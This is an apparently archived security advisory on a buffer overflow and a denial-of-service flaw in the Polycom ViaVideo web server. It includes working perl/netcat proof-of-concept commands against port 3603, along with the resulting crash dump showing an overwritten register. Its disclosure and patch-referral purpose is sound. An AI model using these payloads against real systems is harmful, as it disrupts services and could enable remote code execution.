COMMAND Polycom ViaVideo Web component DoS and remote overflow SYSTEMS AFFECTED Polycom ViaVideo 2.2 Polycom ViaVideo 3.0 PROBLEM In prophecy (advisory @ prophecy.net.nz] advisory : Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component ------------------------------------------------------------------- Proof of Concept ---------------- perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 3603 Error message on host: OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195 Version: Release 3.0 26Feb2002 ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at 001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s) EAX=41414141 EBX=03D491C4 ECX=03D49190 EDX=00000001 ESI=03D49190 EDI=03D4A1E8 EBP=03B6D3F4 ESP=0586FF1C EIP=67302ECE FLG=00010202 CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000 001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s) Problem #2: Denial-of-Service Vulnerability ------------------------------------------- Proof of Concept ---------------- - Open up several (4) connections to the webserver port (3603). - Send any incomplete HTTP request. - Leave these connections open at this point. - Normal requests to the webserver will now fail. - CPU utilisation on remote host (Win2k) goes to 99% for ViaVideo.exe [jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 3603 & [5] 2140 [jonny@loki 15:22:14 ~]$ [jonny@loki 15:22:14 ~]$ jobs [1] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 3603 & [2] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 3603 & [3] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 3603 & [4]- Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 3603 & [5]+ Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 3603 & [jonny@loki 15:22:39 ~]$ SOLUTION A patch has been supplied by Polycom and can be downloaded at: http://www.polycom.com/securitycenter